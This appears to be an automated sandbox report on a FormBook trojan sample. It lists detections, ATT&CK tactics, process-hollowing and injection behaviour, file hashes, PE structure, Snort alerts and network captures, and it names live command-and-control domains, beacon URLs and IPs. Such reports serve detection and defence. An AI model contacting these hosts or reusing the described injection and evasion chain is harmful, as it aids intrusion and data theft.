          Source: Yara match | File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix for this sample, listed per tactic (number of matching signatures in parentheses):

• Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
• Execution: Command and Scripting Interpreter (2), Native API (1), Shared Modules (1), At (Windows), Cron, Launchd, Scheduled Task
• Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
• Privilege Escalation: Access Token Manipulation (1), Process Injection (512), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
• Defense Evasion: Rootkit (1), Virtualization/Sandbox Evasion (2), Access Token Manipulation (1), Process Injection (512), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (1)
• Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
• Discovery: System Time Discovery (1), Security Software Discovery (251), Virtualization/Sandbox Evasion (2), Process Discovery (2), Remote System Discovery (1), File and Directory Discovery (2), System Information Discovery (114)
• Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
• Collection: Credential API Hooking (1), Archive Collected Data (1), Clipboard Data (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
• Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
• Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port
• Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
• Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
• Impact: System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 626561, Sample: inlaww321345.exe, Start date: 14/05/2022, Architecture: WINDOWS, Score: 100

• Start: DNS/IP info: www.rodosmail.xyz, parkingpage.namecheap.com; signatures: Snort IDS alert for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 7 other signatures; started inlaww321345.exe (19)
• inlaww321345.exe: dropped C:\Users\user\AppData\...\idczzzzbpy.exe (PE32); started idczzzzbpy.exe
• idczzzzbpy.exe: Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; started idczzzzbpy.exe
• idczzzzbpy.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected into explorer.exe
• explorer.exe (injected): www.tzjisheng.com 154.85.152.171, port 49810 -> 80, DXTL-HKDXTLTseungKwanOServiceHK, Seychelles; www.informacion-numero-24-h.site 188.114.96.10, port 49808 -> 80, CLOUDFLARENETUS, European Union; System process connects to network (likely due to code injection or exploit); started chkdsk.exe
• chkdsk.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe (1)
• cmd.exe: started conhost.exe

Antivirus detection, initial sample (Source, Detection, Scanner, Label):
• inlaww321345.exe: 54%, Virustotal
• inlaww321345.exe: 56%, ReversingLabs, Win32.Trojan.FormBook
• inlaww321345.exe: 100%, Joe Sandbox ML
Dropped files:
• C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe: 46%, ReversingLabs, Win32.Trojan.FormBook
Unpacked PE files:
• 2.0.idczzzzbpy.exe.400000.7.unpack: 100%, Avira, TR/Crypt.ZPACK.Gen
• 1.2.idczzzzbpy.exe.700000.1.unpack: 100%, Avira, TR/Crypt.ZPACK.Gen
• 2.0.idczzzzbpy.exe.400000.9.unpack: 100%, Avira, TR/Crypt.ZPACK.Gen
• 2.0.idczzzzbpy.exe.400000.5.unpack: 100%, Avira, TR/Crypt.ZPACK.Gen
• 2.2.idczzzzbpy.exe.400000.1.unpack: 100%, Avira, TR/Crypt.ZPACK.Gen
Domains:
• www.tzjisheng.com: 0%, Virustotal
URLs:
• http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0: 0%, Avira URL Cloud, safe
• www.boxberry-my.com/sn31/: 100%, Avira URL Cloud, malware
• http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS: 0%, Avira URL Cloud, safe
Contacted domains (Name, IP, Active, Malicious, Antivirus Detection, Reputation):
• parkingpage.namecheap.com: 198.54.117.212, Active: true, Malicious: false, Reputation: high
• www.informacion-numero-24-h.site: 188.114.96.10, Active: true, Malicious: true, Reputation: unknown
• www.tzjisheng.com: 154.85.152.171, Active: true, Malicious: true, Reputation: unknown
• www.rodosmail.xyz: IP unknown, Active: unknown, Malicious: true, Reputation: unknown
Contacted URLs (Name, Malicious, Antivirus Detection, Reputation):
• http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0: Malicious: true, Avira URL Cloud: safe, Reputation: unknown
• www.boxberry-my.com/sn31/: Malicious: true, Avira URL Cloud: malware, Reputation: low
• http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS: Malicious: true, Avira URL Cloud: safe, Reputation: unknown
URLs from memory and binaries (Name, Source, Malicious, Antivirus Detection, Reputation):
• http://nsis.sf.net/NSIS_ErrorError: Source: inlaww321345.exe, Malicious: false, Reputation: high
Contacted IPs (IP, Domain, Country, ASN, ASN Name, Malicious):
• 154.85.152.171: www.tzjisheng.com, Seychelles, ASN 134548, DXTL-HKDXTLTseungKwanOServiceHK, Malicious: true
• 188.114.96.10: www.informacion-numero-24-h.site, European Union, ASN 13335, CLOUDFLARENETUS, Malicious: true
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:626561
Start date and time: 2022-05-14 13:06:16 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 26s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:inlaww321345.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/4@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 54.9% (good quality ratio 51%)
                  • Quality average: 76.7%
                  • Quality standard deviation: 29.8%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, ocsp.digicert.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed; the report is missing behavior information
                  No simulations
                  No context
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):189439
                  Entropy (8bit):7.991264884489158
                  Encrypted:true
                  SSDEEP:3072:RpjM1D/FiGY508jL8Ih5Ua5OtVtVN20+DLQLYUL11uXGI7dOPHl/vqJJr7iQxX4Y:Q1bY08jwy5UakVtVNAKYULKX5d2/vq7P
                  MD5:E3D27BCFA9AA0D4B5A3F6B09ABBD95A0
                  SHA1:FF9D9165EEB1BC30B24824E3179CE751D0D171CA
                  SHA-256:9367FD47E61A19528C3F5CF2C8DCB9A966AC2760E0E0303D98CB16569DC571C0
                  SHA-512:58C1AD3827E29D5948D5E20330D7B690700BB87618A9635C032FEA2B86435ED8B5D34C9959FABE652478CF775826325CE78E9310F4086159C1DF74E6FD64BBC2
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):80384
                  Entropy (8bit):6.294068907954178
                  Encrypted:false
                  SSDEEP:1536:q6TaC+v1wwfr0oxAomP3cX/4pi2sWjcdNdI:va5CwD1/ui5NW
                  MD5:0A3F789C1F124B76E2EDC74EBEACF70A
                  SHA1:780584F128175C82C09BE5237D6F18CA71F5AF8A
                  SHA-256:88475EA713BF4983BAD0C805626D4C36B4C7F556E0CFE3220D54A66AF49536ED
                  SHA-512:8E6E8107B29C2CBDEA7D0D10F40C0BCB5834C7EE72AD420354B1F10154F263029877F32CC4B66D20C75250C3F9ABEDE40DC9E74AD54472C30E52E5089FE8D1C4
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 46%
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5222
                  Entropy (8bit):6.125161523920119
                  Encrypted:false
                  SSDEEP:96:FAhV3vZOvLSjq3D+2flg3yDUfp7yxbEJhScKZTQOEbzjT:FAh3OvLSGCDCU7yxbEJhLKlQLD
                  MD5:724AADB7157867E0297086B8CB329FDD
                  SHA1:2CAF2D787B88C05EE73FC815F528D0519597BCEC
                  SHA-256:FF0DA8E72E0EB7C85762F73D269CB37E6EF6AB78BCDCDD02CBC600921B416A4F
                  SHA-512:939650530ED755EAEC138D0397CF69095159EACE33A5782094791F2315CBA3693F0FCC0DD2E40DEB4A3E58FD75010F52191FEF6E1053C1C5AE3EEA7CB4F9FE9D
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):281625
                  Entropy (8bit):7.654738046594992
                  Encrypted:false
                  SSDEEP:6144:c1bY08jwy5UakVtVNAKYULKX5d2/vq77i+9hiCkC:h0oUL/0Ukd2ki8hiCx
                  MD5:585D37FBFEFC8B840674B7FBDDDF74A4
                  SHA1:D4027F373F35D9CBDF5C52F98B30C81C74C61BDB
                  SHA-256:4E75A79C5CBEC5424037AF3B798D39110AD2247FC7E4F59DC69FA85E62C34C16
                  SHA-512:98C2B9ABBB5E8808C107F2232AF8ED047DE5E9445C6D27A6787021450317F66CBE717D492EA3A9D7B3F81AC8068B5BB317FA205CAA92FC93BA15945B6E79610B
                  Malicious:false
                  Reputation:low
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.915739431814618
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:inlaww321345.exe
                  File size:277700
                  MD5:43e64e0ab6ca479c2af3afed56216a91
                  SHA1:983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
                  SHA256:cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
                  SHA512:091159b524e3150e412a56f39193601b76fd644c8db4042293e37dfdc54c7d416efc1bfbec4c832fd7b54140b047cda55eee45d834b0fad40f50b800d95003f0
                  SSDEEP:6144:LOtIOKoTojUJuQVK0V4SwDTlAKht8Zy+ksPmQeSB+UGlk:LOLzoYJuQVK0V41GatH+kzQeSB+UGlk
                  TLSH:76441202EBB0C073E6A36E365D3E8B374DE5C9A25815AB2B4B547609BD766C2C10F743
                  Icon Hash:b2a88c96b2ca6a72
                  Entrypoint:0x403646
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007FBB449DEC1Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007FBB449DEBEAh
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [007A8B58h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
Data directories (Name, Virtual Address, Virtual Size, Is in Section):
• IMAGE_DIRECTORY_ENTRY_EXPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_IMPORT: 0x8504, 0xa0, .rdata
• IMAGE_DIRECTORY_ENTRY_RESOURCE: 0x3b9000, 0xa50, .rsrc
• IMAGE_DIRECTORY_ENTRY_EXCEPTION: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_SECURITY: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_BASERELOC: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_DEBUG: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_COPYRIGHT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_GLOBALPTR: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_TLS: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_IAT: 0x8000, 0x2b0, .rdata
• IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: 0x0, 0x0
• IMAGE_DIRECTORY_ENTRY_RESERVED: 0x0, 0x0
Sections (Name, Virtual Address, Virtual Size, Raw Size, Xored PE, ZLIB Complexity, File Type, Entropy, Characteristics):
• .text: 0x1000, 0x67c4, 0x6800, Xored PE: False, ZLIB complexity 0.675180288462, data, entropy 6.49518266675, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
• .rdata: 0x8000, 0x139a, 0x1400, Xored PE: False, ZLIB complexity 0.4498046875, data, entropy 5.14106681717, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
• .data: 0xa000, 0x39ebb8, 0x600, Xored PE: unknown, ZLIB complexity unknown, unknown, entropy unknown, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
• .ndata: 0x3a9000, 0x10000, 0x0, Xored PE: False, ZLIB complexity 0, empty, entropy 0.0, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
• .rsrc: 0x3b9000, 0xa50, 0xc00, Xored PE: False, ZLIB complexity 0.401692708333, data, entropy 4.18753619353, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources (Name, RVA, Size, Type, Language, Country):
• RT_ICON: 0x3b9190, 0x2e8, data, English, United States
• RT_DIALOG: 0x3b9478, 0x100, data, English, United States
• RT_DIALOG: 0x3b9578, 0x11c, data, English, United States
• RT_DIALOG: 0x3b9698, 0x60, data, English, United States
• RT_GROUP_ICON: 0x3b96f8, 0x14, data, English, United States
• RT_MANIFEST: 0x3b9710, 0x33e, XML 1.0 document, ASCII text, with very long lines, with no line terminators, English, United States
Imports (DLL: imported functions):
• ADVAPI32.dll: RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
• SHELL32.dll: SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
• ole32.dll: OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
• COMCTL32.dll: ImageList_Create, ImageList_Destroy, ImageList_AddMasked
• USER32.dll: GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
• GDI32.dll: SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
• KERNEL32.dll: GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system: English; Country where language is spoken: United States
Snort IDS alerts (Timestamp, Protocol, SID, Message, Source Port -> Dest Port, Source IP -> Dest IP):
• 05/14/22-13:08:49.696707, TCP, 2031449, ET TROJAN FormBook CnC Checkin (GET), 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• 05/14/22-13:08:49.696707, TCP, 2031453, ET TROJAN FormBook CnC Checkin (GET), 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• 05/14/22-13:08:49.696707, TCP, 2031412, ET TROJAN FormBook CnC Checkin (GET), 49808 -> 80, 192.168.2.3 -> 188.114.96.10
TCP packets (Timestamp, Source Port -> Dest Port, Source IP -> Dest IP):
• May 14, 2022 13:08:49.679449081 CEST, 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• May 14, 2022 13:08:49.695677996 CEST, 80 -> 49808, 188.114.96.10 -> 192.168.2.3
• May 14, 2022 13:08:49.695893049 CEST, 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• May 14, 2022 13:08:49.696707010 CEST, 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• May 14, 2022 13:08:49.712908030 CEST, 80 -> 49808, 188.114.96.10 -> 192.168.2.3
• May 14, 2022 13:08:49.724560976 CEST, 80 -> 49808, 188.114.96.10 -> 192.168.2.3
• May 14, 2022 13:08:49.724622965 CEST, 80 -> 49808, 188.114.96.10 -> 192.168.2.3
• May 14, 2022 13:08:49.724986076 CEST, 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• May 14, 2022 13:08:49.725151062 CEST, 49808 -> 80, 192.168.2.3 -> 188.114.96.10
• May 14, 2022 13:08:49.741282940 CEST, 80 -> 49808, 188.114.96.10 -> 192.168.2.3
• May 14, 2022 13:09:10.119378090 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.303877115 CEST, 80 -> 49810, 154.85.152.171 -> 192.168.2.3
• May 14, 2022 13:09:10.304033041 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.304163933 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.490811110 CEST, 80 -> 49810, 154.85.152.171 -> 192.168.2.3
• May 14, 2022 13:09:10.490907907 CEST, 80 -> 49810, 154.85.152.171 -> 192.168.2.3
• May 14, 2022 13:09:10.490958929 CEST, 80 -> 49810, 154.85.152.171 -> 192.168.2.3
• May 14, 2022 13:09:10.491028070 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.491060019 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.491131067 CEST, 49810 -> 80, 192.168.2.3 -> 154.85.152.171
• May 14, 2022 13:09:10.675293922 CEST, 80 -> 49810, 154.85.152.171 -> 192.168.2.3
UDP packets (Timestamp, Source Port -> Dest Port, Source IP -> Dest IP):
• May 14, 2022 13:08:49.640903950 CEST, 50152 -> 53, 192.168.2.3 -> 8.8.8.8
• May 14, 2022 13:08:49.670495033 CEST, 53 -> 50152, 8.8.8.8 -> 192.168.2.3
• May 14, 2022 13:09:09.940263033 CEST, 56639 -> 53, 192.168.2.3 -> 8.8.8.8
• May 14, 2022 13:09:10.118308067 CEST, 53 -> 56639, 8.8.8.8 -> 192.168.2.3
• May 14, 2022 13:09:30.653565884 CEST, 62724 -> 53, 192.168.2.3 -> 8.8.8.8
• May 14, 2022 13:09:30.674031019 CEST, 53 -> 62724, 8.8.8.8 -> 192.168.2.3
DNS queries (Timestamp, Source IP -> Dest IP, Trans ID, OP Code, Name, Type, Class):
• May 14, 2022 13:08:49.640903950 CEST, 192.168.2.3 -> 8.8.8.8, 0x9c1c, Standard query (0), www.informacion-numero-24-h.site, A (IP address), IN (0x0001)
• May 14, 2022 13:09:09.940263033 CEST, 192.168.2.3 -> 8.8.8.8, 0x8b0e, Standard query (0), www.tzjisheng.com, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.653565884 CEST, 192.168.2.3 -> 8.8.8.8, 0x8d9d, Standard query (0), www.rodosmail.xyz, A (IP address), IN (0x0001)
DNS answers (Timestamp, Source IP -> Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class):
• May 14, 2022 13:08:49.670495033 CEST, 8.8.8.8 -> 192.168.2.3, 0x9c1c, No error (0), www.informacion-numero-24-h.site, address 188.114.96.10, A (IP address), IN (0x0001)
• May 14, 2022 13:08:49.670495033 CEST, 8.8.8.8 -> 192.168.2.3, 0x9c1c, No error (0), www.informacion-numero-24-h.site, address 188.114.97.10, A (IP address), IN (0x0001)
• May 14, 2022 13:09:10.118308067 CEST, 8.8.8.8 -> 192.168.2.3, 0x8b0e, No error (0), www.tzjisheng.com, address 154.85.152.171, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), www.rodosmail.xyz, CName parkingpage.namecheap.com, CNAME (Canonical name), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.212, A (IP address), IN (0x0001)
• May 14, 2022 13:09:30.674031019 CEST, 8.8.8.8 -> 192.168.2.3, 0x8d9d, No error (0), parkingpage.namecheap.com, address 198.54.117.217, A (IP address), IN (0x0001)
